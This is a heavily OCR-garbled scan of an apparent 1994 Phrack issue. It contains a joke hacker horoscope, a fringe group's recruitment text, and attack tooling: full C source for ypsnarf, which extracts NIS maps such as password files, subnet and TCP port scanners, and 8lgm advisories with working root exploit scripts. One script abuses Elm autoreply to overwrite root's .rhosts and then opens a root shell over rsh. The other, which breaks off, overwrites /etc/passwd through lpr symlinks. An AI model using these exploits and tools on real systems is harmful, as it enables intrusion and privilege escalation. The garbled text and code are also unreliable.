That’s bullshit? You don’t 
's th 


official PHRACK 


You can use this chart to find out your zodiac sign by your DOB. 
Aquarius..... 01/20 - 02/18 GOs Peas Sed 07/23 - 08/22 
Pisces....... 02/19 - 03/20 Vargo. i keds 08/23 - 09/22 
ALTOS es eek cues 03/21 - 04/19 DEOL As vee es 09/23 - 10/22 
TAULUS Ged 2 04/20 - 05/20 SCOP PLO heeds 10/23 - 11/21 
Gemini....... 05/21 - 06/20 Sagittarius..11/22 - 12/21 
Cancer....... 06/21 - 07/22 Capricorn....12/22 - 01/19 

oOo This summer’s best combinations 000 
YOU OVE, BS VICTIM HOT WAREZ 
Aquarius Libra Leo Sagittarius 
Pisces Sagittarius Aquarius Cancer 
Aries Aries Cancer Capricorn 
Taurus Gemini Pisces Taurus 
Gemini Cancer Aries Scorpio 
Cancer Leo Virgo Gemini 
Leo Scorpio Gemini Leo 
Virgo Capricorn Sagittarius iibra 
Libra Virgo Libra Virgo 
Scorpio Pisces Capricorn Pisces 
Sagittarius Aquarius Scorpio Aquarius 
Capricorn Taurus Taurus Aries 
And Now... The 3133t And Official PHRACK Summer 1994 Horoscope! 


Aries 


There is a pot full 


[March 21st - April 19th] 


of kO0DeZ at the 


[Try to channel all 
find it in /bin/gi 


your ambition on 
f/kitchen.gear. 


Luck [oooo.] - Wea 


Taurus 


lth 


[oo...] - Bust 


[April 20th - May 20th] 


hint: 


risk [ooo..] 


end of the rainbow for you. 
finding it, 


you won’t 


Warning: Risk of bust between August 5th and August 10th! 
- Love 


| Boene eral | 
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PhedZzZz are lurking behind Saturn, obscured behind one of the rings. 

Be sure to *67 all your calls, and you’1l be fine. Hint: Don’t undertake 
any interstellar space travel, and avoid big yellow ships. 

Watch out for SprintNet Security between July 12th and August Ist. 

Luck [oo...] - Wealth [oo...] - Bust risk [o0000.] - Love [ooo..] 


Gemini [May 2lst - June 20th] 
There might be a force dragging you into warez boards. Try to resist 
the attraction, or you might be thrown out of the paradise. 

Hint: If a stranger with a /ASL connect crosses your way, stay away 
from him. 

Warning: Your Dual Standard HST might explode sometime in June. 
Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [o0o0...] 


Cancer [June 21st - July 22nd] 
There are dark forces on your trail. Try to avoid all people wearing 
suits, don’t get in their cars, and don’t let them give you shit. 
Hint: Leave the country as soon if you can, or you won’t be able to. 
Look out for U4EA on IRC in late July, you might get /killed. 

Luck [o....] - Wealth [oo...] - Bust risk [00000] - Love [oo...] 


Leo [July 23rd - August 22nd] 


The path of Venus this year tells us that there is love on the way 

for you. Don’t look for it on X-rated ftp sites, it might be out there 
somewhere. Hint: Try getting out of the house more frequently or you 
might miss it. 

Warning: If Monica Weaver comes across your way, break and run! 

Luck [o00..] - Wealth [o....] - Bust risk [o0o0...] - Love [o0000.] 


Virgo [August 23rd —- September 22nd] 


Pluto tells us that you should stay away from VAXes in the near future. 
Lunatic force tells us that you might have more luck on Berkeley UNIX. 
Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs. 

Warning: In the first week of October, there is a risk of being ANIed. 
Luck [o000.] - Wealth [oo...] - Bust risk [oo...] - Love [o....] 


Libra [September 23rd - October 22nd] 


The closer way of Mars around the Sun this year might mean that you 
will be sued by a telco or a big corporation. The eclipse of Uranus 
could say that you might have some luck and card a VGA 486 Laptop. 
Hint: Be careful on the cordless. 

Watch out for good stuff in dumpsters between July 23rd and July 31st. 
Luck [o00...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...] 


Scorpio [October 23rd - November 21st] 


Sun propulsions say that you should spend more time exploring the 
innards of credit report systems, but be aware that Saturn reminds 
you that one local car dealer has his I.D. monitored. 

Hint: Stay out of #warez 
Warning: A star called 43-141 might be your doom. Watch out. 
Luck [o000..] -— Wealth [oooo.] - Bust risk [o00...] - Love [o0o0...] 


Sagittarius [November 22nd - December 21st] 


Cold storms on Pluto suggest that you don’t try to play eleet 
anarchist on one of the upcoming cons. Pluto also sees that there 
might be a slight chance that you catch a bullet pestering a cop. 
Hint: Be nice to your relatives. 

You might get lucky BSing during the third week of August. 

Luck [o....] - Wealth [oo...] - Bust risk [oo00..] - Love [oo...] 
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Capricorn [December 22nd —- January 19th] 


This summer brings luck to you. Everything you try is about to work 
out. You might find financial gain in selling k0ODeZ to local warez 
bozos. Hint: Don’t try to BS at a number who is a prime number, they 
will trace your ass and beat you to death with a raw cucumber. 
Special kick of luck between June 14th and July 2nd. 

Luck [00000] —- Wealth [oooo.] - Bust risk [o00...] - Love [000..] 


Aquarius [January 20th - February 18th] 


The third moon of Saturn suggests to stay in bed over the whol 
summer, or everything will worsen. Avoid to go to any meetings 
and cons. Do not try to get up before September 11th. 

Hint: You can risk to call PRODIGY and have a gR3aT time. 
Warning: High chance of eavesdroping on your line on August 14th. 
Luck: 'Piscar vs ] - Wealth [o....] - Bust risk [00000] - Love [o....] 


Pisces [February 19th - March 20th] 


Mars reads a high mobility this summer. You should try to go to a 
foreign county, maybe visit HEU II. Finances will be OK. Do not go 

on any buses for that might be your doom. 

Hint: Don’t get a seat near a window, whatever you do. 

Warning: Avoid 6’8" black guys in Holland, they might go for your ass. 


Luck [o00..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...] 
If your horoscope does not come true, complain to god@heaven.mil. 31337 
If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R 


The SenseReal Mission 

If you are reading this it indicates you have reached a point 
along your journey that you will have to decide whether you agree 
with The SenseReal Foundation or whether you think that those who 
believe and support The SenseReal Foundation are crazy. Your 
decision to join The SenseReal Foundation on it’s mission will 
undoubtedly change your life forever. When you understand the 
reason it exists and what it seeks you will better know how to 
decide. That is why this text was created. 

He is known as Green Ghost. Some know him as Jim Nightshade. He 
was born in 1966. He is not a baby boomer and he is not a 
Generation Xer. He falls into that group of the population that 
has so far escaped definition. He is a (yberpunk. He was (yberpunk 
before (yberpunk was cool. He is the founder and leader of The 
SenseReal Foundation. You will learn more about him later. 

But first you will have to know about the background. There once 
was a man named Albert Hoffman. In 1943, on April 16 Hoffman 
absorbed a threshold amount of the drug known as LSD. He 
experienced "a peculiar restlessness". LSD since that time has 
played an important role in this world. 

There are other agents involved in the story. Mary Pinchot, JFK, 
Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley 
and many others. There are too many details and explanations 
necessary to explain everything here. But this does not matter. 

Because the SenseReal Foundation is about riding the wave. We 
believe that the ultimate goal cannot be defined. To define it 
would be to destroy it. 

The SenseReal Foundation hopes that things can be changed for 
the better. But we realize that the situation can become 
much worse. From what history teaches us and what we instinctively 
feel, we know that there is a great probability that things will 
get much worse before and if things ever get better. Doom looms 
on the horizon like an old friend. 

Freedom is being threatened every day and The SenseReal 
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Foundation seeks to defend and seek Freedom. Big Brother is here 
NOW and to deny his existence is only to play into his hand. The 
goal of our government both here in America and worldwide is to 
remain in power and increase it’s control of The People. To 
expose Big Brother and destroy him is one of the many goals of 
The SenseReal Foundation. 

As a member of (yberspace and an agent of The SenseReal 
Foundation you will have to carefully consider your interaction 
with the flow of Info. The ideals of Liberty must be maintained. 
The SenseReal Foundation provides a grounding point. The place 
where the spark transfers from plasma to light and back to plasma. 
Tesla was not on the wrong track. The SenseReal Foundation is a 
mechanism which seeks to increase Freedom. Only by learning more 
can we defeat the Evil. The Good must prevail. 
If you have the Hacker spirit and think along the same lines 
then The SenseReal Foundation may be your calling. If you think 
like J.R. Dobbs or Green Ghost then it is possible we can make it 
through The Apocalypse. A final date has never been announced for 
t 
h 


his event. Green Ghost does not claim to know the exact date but 
e does claim to have some Info on it. 

Green Ghost does not claim to have all the answers or even to 
know all the questions. He was first exposed to computers in the 
early 70’s at his local high school. The first computer he ever 
used was a Honeywell terminal connected to a mainframe operated 
at the home office of Honeywell and operated for the school. 

This machine was programed by feeding it stacks of cards with 
boxes X’d out with a No. 2 pencil. It did have a keyboard hooked 
up to a printer which served for the monitor. The text was typed 
out and the paper rolled out of the machine in great waves. 
This experience left him wanting more. Somewhere between th 
machine and the mind were all the questions and all the answers. 

The SenseReal Foundation will supply some of the means. We 
must all work together if we are to succeed. UNITED WE STAND, 
DIVIDED WE FALL. If you wish to participate with The SenseReal 
Foundation you must devote yourself to becoming an Info Agent. 

As an Info Agent it is your duty to seek Truth and Knowledge 
out wherever it is located. To Learn and to seek to increase 
the Learning of all at The SenseReal Foundation. Different 
people will be needed to help out in different ways. 

SenseReal’s Info Agents are located all around the world and 
are in contact with fellow SenseReal members via any one of 
several SenseReal facilities. The primary establishment and 
headquarters of The SenseReal Foundation is SenseReal’s own 
online system: 

T /=/-E ff /=\. (4s R- 8S) ANI TEN ANAS 0-7 
Saoirse db 810 Se FBS. = 54048 0 tea<c<< 
27 Hours Per Day /14.4 Supra /Home of The SenseReal Foundation 
Also contact via SenseReal’s mail drop by writing or sending 
materials to: TSF \ Electronic Mail: 
P.O. BOX 6914 \ Green_Ghost@neonate.atl.ga.us 
HILTON HEAD, SC 29938-6914 \ 

The Hacker’s /\/\ansion is a system like no other. While it is 
not your typical Hackers board it has much Info on Hacking. While 
it is not like any Adult system you’ve ever seen it has the most 
finest Adult material available anywhere. It is not a Warez board 
but we are definitely Pirates. Because we are (yberpunks. What 
makes the Hacker’s Mansion different is our emphasis on quality. 
Everything that you find at The /-/acker’s /\/\ansion is 1ST 
(lass. All the coolest E-zines are pursued here. Phrack, CUD, and 
Thought Virus to name just a few. Of course there is one other 
source for Thought Virus: 

Send E-Mail to: ListServ@neonate.atl.ga.us 
In the subject or body of the message writ 

FAQ ThoughtCriminals 
and you will receive the current issue in your E-Mail box in no 
time. If you wish to join the Thought Criminals mailing list and 
communicate with your fellow Thought Criminals via E-Mail then 
send another message to: ListServ@neonate.atl.ga.us 


ral 
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and write the following in the subject or body of 


Subscribe ThoughtCriminals Your-Address-—Her 
or simply: Subscribe ThoughtCriminals 


the message: 


To mail others on the Thought Criminals mailing 


list send a message 


l may depend on 
iance of many 


as our friends from other planets can 
l but we don’t have 


just interested 


to: ThoughtCriminals@neonate.atl.ga.us 

Tell us all. Communication is vital. Our survival 

it. The SenseReal Foundation is about the alleg 

people, and indeed beings, 

tell you. The EFF inspired us and was a mode] 

the EFF’s money so we need YOU. If you are someone who can 
contribute or who believes in The Cause or are 

in Tax Resistance or the Fr The Weed movement 


join The SenseReal Foundation today. Contact us 


above channels and become a Freedom Fighter today. 


the essence. 


then you should 
through any of 
Time is of 
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ypsnarf xercise security holes in yp/nis. 
Based on code from Dan Farmer 
(casper@fwi.uva.nl). 

Usage: 
ypsnar 
- to 
ypsnar 
= CO 
ypsnar 
= VEO 


server client 
btain the yp domain name 
server domain mapname 
btain a copy of a yp map 
server domain maplist 
obtain a list of yp maps 


[e) 
[e) 


In the first 
a BOOTPARAMPROC_WHOAMI 
to work, "server" must 
diskless client of (wel 


case, we 


W 


request to the host 


ll, it must boot from) 
he second case, 
ing if it serves domain "domain". If so, 
YPPROC_NEXT requests (just like "ypcat") 
"mapname". 
use the shorthand names provided by "ypcat". 


In the third case, the special map name 


Since the callrpc() routine does 
artificially impose a timeout of YPSNARF_TIM 
initial requests, and YPSNARF_TIM 


This program uses UDP packets, which means t 
will get dropped on the floor; 


practice though, 


To compile: 
cc -o ypsnarf ypsnarf.c —-lrpcsvc 


BE SR RY SE SR a eS aR. Sah. DR Re SR R09, SRS BE) BR a. UR ae a aR 8h, RS LE RTS ts RS DEL ooh: aah aah” BRL coh LB ES 3b i Oe 


DO NOT 


(zen@death.corp.sun.com) 


lie and pretend to be the host 


be running rpc.bootparamd, 


we send a YPPROC_DOMAIN request to the host 


not make any provision for timeouts, 


it’s not a reliable stream like TCP. 
this doesn’t seem to be a problem. 


THEM. PLEASE 


RUST COMPLET 


ILL S$! 
BLY. 


and Casper Dik 


"client", and send 
Note that for this 
"client" must be a 


server". 
and 
"Server". 


"Server", 
we send YPPROC_FIRST and 


to obtain a copy of the yp map 
Note that you must specify the full yp map name, 


you cannot 


"maplist" tells ypsnarf to send 


a YPPROC_MAPLIST request to the server and get the list of maps in domain 
"domain", instead of getting the contents of a map. If the server has a 
map called "maplist" you can’t get it. Oh well. 


we 
EFOUT1 seconds during the 


FOUT2 seconds during a map transfer. 


here’s a chance that things 
In 
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Engineering Computer Network 
Engineering Building 


West Lafayette, IN 47907 
davy@ecn.purdue.edu 
January, 1991 


+ + + + + + F F F 


™~ 


<sys/param.h> 
<sys/socket.h> 
<netinet/in.h> 
<arpa/inet.h> 
<rpc/rpce.h> 


lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 
lude 


2) 
Q 


12] 
Q 


5 5 
Qa 


©] 
Q 


=) 
Q 


<rpcsvc/yp_prot.h> 
<rpc/pmap_clnt.h> 
<sys/time.h> 
<signal.h> 
<string.h> 
<netdb.h> 
<stdio.h> 


=) 
Q 


{a} 
Q 


2) 
Q 


{a} 
Q 


=) 
Q 


Pep pe pe pe pe pe pe pe pe pe ae 
=) 
Q 


‘a] 
Q 


define BOOTPARAM _MAXDOMAINL 


<rpcsvc/bootparam.h> 


define YPSNARF_ 
define YPSNARF_TIMEOU 


char *pname; 


main(argc, argv) 
char **argv; 
int argc; 


{ 


char *server, *client, *domain, *mapname; 
pname = *argv; 
/* 
* Process arguments. This is less than robust, but then 
* hey, you’re supposed to know what you’re doing. 
* 
switch (argc) { 
case 3: 
server argv; 
client *++argv; 
get_yp_domain(server, client); 
exit (0); 
case 4: 
server argv; 
domain *++argv; 
mapname = *++argv; 
if (strcmp (mapname, "maplist") == 0) 
get_yp_maplist (server, domain); 
else 
get_yp_map (server, domain, mapname) ; 
exit (0); 
default: 
fprintf(stderr, "Usage: %s server client —-", pname) ; 
fprintf(stderr, "to obtain yp domain name\n"); 
fprintf(stderr, " $s server domain mapname -", pname); 
fprintf(stderr, "to obtain contents of yp map\n"); 
exit (1); 


/* 


/* program name 


EN 32 /* from rpc.bootparamd 


ef 


#f 


IMEOUT1 15 /* timeout for initial request */ 
[2 30 /* timeout during map transfer */ 
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* get_yp_domain - figure out the yp domain used between server and 
wy, 
get_yp_domain(server, client) 
char *server, *client; 
{ 
long hostip; 
struct hostent *hp; 
bp_whoami_arg w_arg; 
bp_whoami_res w_res; 
extern void timeout (); 
enum clnt_stat errcode; 
/* 
* Just a sanity check, here. 
* 
if ((hp = gethostbyname(server)) == NULL) { 
fprintf(stderr, "%s: %s: unknown host.\n", pname, server); 
exit(1); 
} 
/* 
* Allow the client to be either an internet address or a 
* host name. Copy in the internet address. 
mf 
if ((hostip = inet_addr(client)) == -1) { 
if ((hp = gethostbyname(client)) == NULL) { 
fprintf(stderr, "Ss: %s: unknown host.\n", pname, 
client); 
exit(1); 


} 


bcopy (hp->h_addr_list[0], 
(caddr_t) 
hp->h_length) ; 

} 

else { 

bcopy ( (caddr_t) 
(caddr_t) 
sizeof (ip_addr_t)); 


é&hostip, 


} 


w_arg.client_address.address_type 
bzero((caddr_t) &w_res, 


/* 
* 
* 
* 
* / 

signal (SIGALRM, timeout); 

alarm (YPSNARF_TIMEOUT1) ; 


the server. 


errcode callrpc(server, 
BOOTPARAMPROC_WHOAMI, 
xdr_bp_whoami_res, &w_res); 


alarm(0); 


if (errcode != RPC_SUCCESS) 
print_rpc_err(errcode) ; 


/* 
* Print the domain name. 
* / 


rintf("%.*s", BOOTPARAM MAXDOMAINL 
p 


/* 


* The maximum domain name length is 255 characters, 


&w_arg.client_address.bp_address 


Send a BOOTPARAMPROC_WHOAMI request to the server. 
give us the yp domain in the response, 


éw_arg.client_address.bp_address.ip_addr, 


.ip_addr, 


IP_ADDR_TYPE; 


sizeof (bp_whoami_res) ); 


This will 
IFF client boots from 


BOOTPARAMPROG, BOOTPARAMVERS, 
xdr_bp_whoami_arg, 


&W_arg, 


EN, w_res.domain_name) ; 


but the 


client. 
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* rpc.bootparamd program truncates anything over 32 chars. 
aif 
if (strlen(w_res.domain_name) >= BOOTPARAM MAXDOMAINLEN) 


printf(" (truncated?)"); 

/* 

* Put out the client name, if they didn’t know it. 
* / 
if (hostip != -1) 

printf(" (client name = %s)", w_res.client_name) ; 


putchar(’\n’); 
} 


/* 

* get_yp_map - get the yp map "mapname" from yp domain "domain" from server. 
ey. 
get_yp_map (server, domain, mapname) 
char *server, *domain, *mapname; 

{ 

char *reqp; 

bool_t yesno; 

u_long calltype; 

bool (*xdr_proc) (); 

extern void timeout (); 

enum clnt_stat errcode; 

struct ypreq_key keyreq; 

struct ypreq_nokey nokeyreq; 
struct ypresp_key_val answer; 


/* 
* This code isn’t needed; the next call will give the same 
* error message if there’s no yp server there. 


ar 

#ifdef not_necessary 

/* 
* "Ping" the yp server and see if it’s there. 
a 


signal (SIGALRM, timeout); 
alarm (YPSNARF_TIMEOUT1) ; 


errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0, 
xdr_void, 0); 


alarm(0); 


if (errcode != RPC_SUCCESS) 
print_rpc_err(errcode) ; 

#endif 

/* 
* Figure out whether server serves the yp domain we want. 
#/ 


signal (SIGALRM, timeout); 
alarm(YPSNARF_TIMEOUT1) ; 


errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN, 
xdr_wrapstring, (caddr_t) &domain, xdr_bool, 
(caddr_t) &yesno); 


alarm(0); 


if (errcode != RPC_SUCCESS) 
print_rpc_err(errcode) ; 
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if (yesno == FALSE) { 
fprintf(stderr, "%s: %s does not serve domain %s.\n", pname, 
server, domain); 


exit(1); 

} 
/* 

* Now we just read entry after entry... The first entry we 
* get with a nokey request. 

*/ 


keyreq.domain = nokeyreq.domain = domain; 
keyreq.map = nokeyreq.map = mapname; 

reqp = (caddr_t) &nokeyreqd; 
keyreq.keydat.dptr = NULL; 


answer.status = TRUE; 
calltype = YPPROC_FIRST; 
xdr_proc = xdr_ypreq_nokey; 


while (answer.status == TRUE) { 
bzero((caddr_t) &answer, sizeof(struct ypresp_key_val)); 


signal (SIGALRM, timeout); 
alarm(YPSNARF_TIMEOUT2) ; 


a 


errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc, 
reqp, xdr_ypresp_key_val, &answer); 


alarm(0); 


if (errcode != RPC_SUCCESS) 
print_rpc_err(errcode) ; 


/* 
* Got something; print it. 
if 

if (answer.status == TRUE) { 


printf("%.*s\n", answer.valdat.dsize, 
answer.valdat.dptr); 


} 
/* 


* Now we’re requesting the next item, so have to 
* send back the current key. 


mf 
calltype = YPPROC_NEXT; 
reqp = (caddr_t) &keyreq; 


xdr_proc = xdr_ypreq_key; 


if (keyreq.keydat.dptr) 
free (keyreq.keydat.dptr); 


keyreq.keydat = answer.keydat; 


if (answer.valdat.dptr) 
free (answer.valdat.dptr); 
} 
} 


/* 

* get_yp_maplist - get the yp map list for yp domain "domain" from server. 
Ay 
get_yp_maplist (server, domain) 
char *server, *domain; 

{ 

bool_t yesno; 

extern void timeout (); 

struct ypmaplist *mpl; 
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enum clnt_stat errcode; 
struct ypresp_maplist maplist; 


/* 


* This code isn’t needed; the next call will give the same 
* error message if there’s no yp server there. 
if 

#ifdef not_necessary 

/* 


* 
*/ 
signal (SIGALRM, timeout); 
alarm (YPSNARF_TIMEOUT1) ; 


"Ping" the yp server and see if it’s there. 


errcode = callrpc(host, 
xdr_void, 0); 


YPPROG, YPVERS, YPPROC_NULL, xdr_void, 


alarm(0); 


if (errcode != RPC_SUCCESS) 
print_rpc_err(errcode) ; 

#endif 

/* 


* Figure out whether server serves the yp domain we want. 
ef 

signal (SIGALRM, timeout); 

alarm (YPSNARF_TIMEOUT1) ; 


errcode = callrpc(server, YPPROG, YPVERS, 
xdr_wrapstring, (caddr_t) &domain, 
(caddr_t) &yesno); 


YPPROC_DOMAIN, 
xdr_bool, 
alarm(0); 


if (errcode != RPC_SUCCESS) 
print_rpc_err(errcode) ; 


/* 
* Nope 
*/ 
if (yesno == FALSE) { 
fprintf(stderr, "%s: %s does not serve domain %s.\n", pname, 
server, domain); 
exit(1); 


} 


maplist.list = (struct ypmaplist *) NULL; 
/* 

* Now ask for the list. 

* 


signal (SIGALRM, timeout); 
alarm (YPSNARF_TIMEOUT1) ; 


errcode = callrpc(server, YPPROG, YPVERS, 
xdr_wrapstring, (caddr_t) &domain, 
xdr_ypresp_maplist, &maplist); 


YPPROC_MAPLIST, 


alarm(0); 


(errcode != RPC_SUCCESS) 
print_rpc_err(errcode) ; 


if (maplist.status != YP_TRUE) { 

fprintf(stderr, "%s: cannot get map list: %s\n", 
yperr_string(ypprot_err(maplist.status))); 

exit (1); 


pname, 
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/* 
* Print out the list. 
# 
for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next) 


printf ("Ss\n", mpl—->ypml_name) ; 


} 
/* 


* print_rpc_err - print an rpc error and exit. 
*/ 

print_rpc_err (errcode) 

enum clnt_stat errcode; 


{ 


fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode) ); 
exit(1); 

} 
/* 

* timeout - print a timeout and exit. 

*/ 


void timeout () 

{ 

fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname); 
exit(1); 

} 


'/bin/perl -s 


Scan a subnet for valid hosts; if given hostname, will look at the 


255 possible hosts on that net. Report if host is running rexd or 
ypserv. 
Usage: scan n.n.n.n 


mine, by default 


$default = "1300.80.26"; 

= ese 

if ($v) { $verbose = 1; } 

if (S#ARGV == -1) { $root = $default; } 


else { Sroot = SARGV[0]; } 


# ip address 
if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) { 
(Sna, Sad, Sty, Sle, @host_ip) = gethostbyname (Sroot) ; 
(Sone, Stwo,$three,$four) = unpack (’C4’,Shost_ip[0]); 
Sroot = "Sone.Stwo.$three"; 
if (Sroot eq "..") { die "Can’t figure out what to scan...\n"; 


} 


print "Subnet Sroot:\n" if Sverbose; 

for Si .(01. 2255) -{ 
print "Trying Sroot.S$i\t=> " if Sverbose; 
&resolve("Sroot.$i"); 


} 


Do the work 


sub resolve { 


local (Sname) = @_; 
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# ip address 


if ($nam ~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) { 
(S$a,$Sb,$c,$d) = split(/\./, Sname) ; 
@ip = (S$a,$b,$c,$d); 
(Sname) = gethostbyaddr(pack("C4", @ip), &AF_INET); 
} 
else { 
(Sname, Saliases, Stype, Slen, @ip) = gethostbyname ($name) ; 


($a,$b,$c,$d) = unpack (’C4’,S$ip[0]); 
} 


if (Sname && @ip) { 
print "Sa.$b.$c.$d\tSname\n"; 
system("if ping Sname 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null 
; then showmount -e Sname\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running 
rexd.\"\nfi\nif rpcinfo -u Sname 100004 > /dev/null ; then echo \"R 
unning ypserv.\"\nfi\nfi") ; 
} 


else { print "unable to resolve address\n" if Sverbose; } 


} 


sub AF_INET {2; } 


/* 
* probe_tcp_ports 
yf 


include <sys/types.h> 
include <sys/stat.h> 
include <stdio.h> 
include <ctype.h> 
#include <sys/socket.h> 
include <netinet/in.h> 
include <netdb.h> 


define RETURN_ERR -1 
define RETURN_FAIL 0 
define RETURN_SUCCESS 1 
int Debug; 
int Hack; 
int Verbose; 


main(ArgC, ArgV) 


int ArgC; 

char **ArgV; 

{ 

int Index; 

int SubIndex; 

for (Index = 1; (Index < ArgC) && (ArgV[Index] [0] == ’-’); Index+tt) 


for (SubIndex = 1; ArgV[Index] [SubIndex]; SubIndex++) 
switch (ArgV[Index] [SubIndex] ) 
{ 
case 'd’: 
Debugtt+; 
break; 
case 'h’: 
Hack++; 
break; 
case 'v 
Verbosett; 
break; 


I. 
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default: 
(void) fprintf(stderr, 


"Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n"); 


exit (1); 
} 


for (; Index < ArgC; Index++) 

(void) Probe_TCP_Ports (ArgV[Index]); 
exit (0); 
} 


Probe_TCP_Ports (Name) 


char *Name; 
{ 

unsigned Port; 
char *Host; 


struct hostent *HostEntryPointer; 
struct sockaddr_in SocketInetAddr; 
struct hostent TargetHost; 

struct in_addr TargetHostAddr; 


char *AddressList[1]; 
char NameBuffer[128]; 
extern int inet_addr(); 
extern char *rindex(); 

if (Name == NULL) 

return (RETURN_FAIL); 

Host = Name; 

if (Host == NULL) 

return (RETURN_FAIL); 


HostEntryPointer = gethostbyname (Host) ; 
if (HostEntryPointer == NULL) 


TargetHostAddr.s_addr = inet_addr (Host); 
if (TargetHostAddr.s_addr == -1) 

{ 
(void) printf ("unknown host: %s\n", Host); 
return (RETURN_FAIL); 

} 
(void) strcpy(NameBuffer, Host); 
TargetHost.h_name = NameBuffer; 
TargetHost.h_addr_list = AddressList, TargetHost.h_addr = 
(char *) &TargetHostAddr; 
TargetHost.h_length = sizeof(struct in_addr); 
TargetHost.h_addrtype = AF_INET; 

TargetHost.h_aliases = 0; 

HostEntryPointer = &TargetHost; 

} 
SocketInetAddr.sin_family = HostEntryPointer->h_addrtype; 


bcopy (HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr, 


HostEntryPointer->h_length) ; 


for (Port = 1; Port < 65536; Port+t) 


(void) Probe_TCP_Port (Port, HostEntryPointer, SocketInetAddr) ; 


return (RETURN_SUCCESS) ; 


Probe_TCP_Port (Port, HostEntryPointer, SocketInetAddr) 
unsigned Port; 
struct hostent *HostEntryPointer; 
struct sockaddr_in SocketInetAddr; 

{ 
char Buffer [BUFSIZ]; 
int SocketDescriptor; 
struct servent *ServiceEntryPointer; 
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SocketInetAddr.sin_port = Port; 
SocketDescriptor = socket (AF_INET, SOCK_STREAM, 6); 
if (SocketDescriptor < 0) 
{ 
perror ("socket"); 
return (RETURN_ERR) ; 
} 
if (Verbose) 
{ 


(void) printf("Host Ss, Port %d ", HostEntryPointer->h_name, 


Port); 
if ((ServiceEntryPointer = getservbyport (Port, "tcp")) != 
(struct servent *) NULL) 
(void) printf(" (\"%Ss\" service) " 
ServiceEntryPointer->s_name) ; 

(void) printf("connection ... "); 

(void) fflush(stdout); 

} 
if (connect (SocketDescriptor, (char *) &SocketInetAddr, 


sizeof (SocketInetAddr)) < 0) 
{ 
if (Verbose) 
(void) printf("NOT open.\n"); 
if (Debug) 
perror ("connect") ; 
} 
else 
{ 
if (!Verbose) 
{ 
(void) printf("Host %s, Port %d ", 


HostEntryPointer->h_name, Port); 
if ((ServiceEntryPointer = getservbyport (Port,"tcp")) != 
(struct servent *) NULL) 
(void) printf(" (\"%Ss\" service) ", 
ServiceEntryPointer->s_name) ; 
(void) printf("connection ... "); 
(void) fflush(stdout); 
} 
(void) printf ("open.\n"); 


if (Hack) 
{ 
(void) sprintf (Buffer, "/usr/ucb/telnet %s %d", 
HostEntryPointer->h_name, Port); 
(void) system(Buffer) ; 
} 
} 


(void) close (SocketDescriptor); 
return (RETURN_SUCCESS) ; 


} 


[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991 


PROGRAM: 


autoreply(1) (/usr/local/bin/autoreply) 
Supplied with the Elm Mail System 


VULNERABLE OS’s: 


a 


Any system with a standard installation of The Elm Mail System. 
All versions are believed to have this vulnerability. 


DESCRIPTION: 
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autoreply(1) can be used to create root owned files, with mode 
666. It can also overwrite any file with semi user-controlled 
data. 


IMPACT: 


Any user with access to autoreply(1l) can alter system files and 
thus become root. 


2 
[t] 
U 


PEAT BY: 


This example demonstrates how to become root on most affected 
machines by modifying root’s .rhosts file. Please do not do 
this unless you have permission. 


Create the following script, ’fixrhosts’: 


8< cut her 
!/bin/sh 


fixrhosts rhosts-file user machine 


if [ S# -ne 3 ]; then 

echo "Usage: ‘basename $0* rhosts-file user machine" 
exit 1 

fi 

RHOSTS="S1" 
USERNAME="$2" 
MACHINE="$3" 

cd $HOME 
echo x > "a 
SMACHINE SUSERNAM 
lotus 
umask 022 
autoreply "a 
SMACHINE SUSERNAME 
b" 

cat > /tmp/.rhosts.sh.$$ << 'EOF’ 

In -s $1 ‘echo $$ | awk ‘’{printf "/tmp/arep.%06d", S1}’* 
exec autoreply off 
exit 0 
EOF 

/bin/sh /tmp/.rhosts.sh.$$ SRHOSTS 

rm -f /tmp/.rhosts.sh.$$ "a 

SMACHINE SUSERNAME 
Joti 
exit 0 


[7] 


8< cut her 


(Lines marked with > represent user input) 


uid=97(8lgm) gid=97(8lgm) groups=97 (81lgm) 

> % ./fixrhosts “~root/.rhosts 8lgm localhost 
You’ve been added to the autoreply system. 
You’ve been removed from the autoreply table. 
> © rsh localhost -1l root csh -i 

Warning: no access to tty. 

Thus no job control in this shell. 


# 


FIX: 


1. Disable autoreply. 
2. Wait for a patch from the Elm maintainers. 
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[8lgm]-Advisory—-3.UNIX.1lpr.19-Aug-1991 


PROGRAM: 
lpr(1) (/usr/ucbh/lpr or /usr/bin/lpr) 
VULNERABLE OS’s: 


SunOS 4.1.1 or earlier 
BSD 4.3 

BSD NET/2 Derived Systems 
A/UX 2.0.1 


Most systems supporting the BSD LP subsystem 


ESCRIPTION: 


can be used to overwrite or create 
ile on the system. 


(and become owner of) 
lpr -s allows users to create symbolic 


in lpd’s spool directory 
1000 invocations of lpr, 


(typical 


lly /var/spool/lpd). 


lpr will 


reuse the filename in 


he spool directory, and follow the 


link previously installed. 


l thus overwrite/creat 


any file that this link points too. 
PACT: 


ny user with access to lpr(l1) 
become root. 


can alter system files and thus 


FA 


EAT BY: 


This example demonstrates how to become root on most affected 
machines by modifying /etc/passwd and /etc/group. Please do 
not do this unless you have permission. 


Create the following script, '’lprcp’: 
8< cut her 
!/bin/csh -f 
Usage: lprcp from-file to-fil 
if (S#argv != 2) then 
echo Usage: lprcp from-file to-fil 
exit 1 
endif 


This link stuff allows us to overwrite unreadable files, 
should we want to. 

echo x > /tmp/.tmp.$$ 

lpr -q -s /tmp/.tmp.$$ 


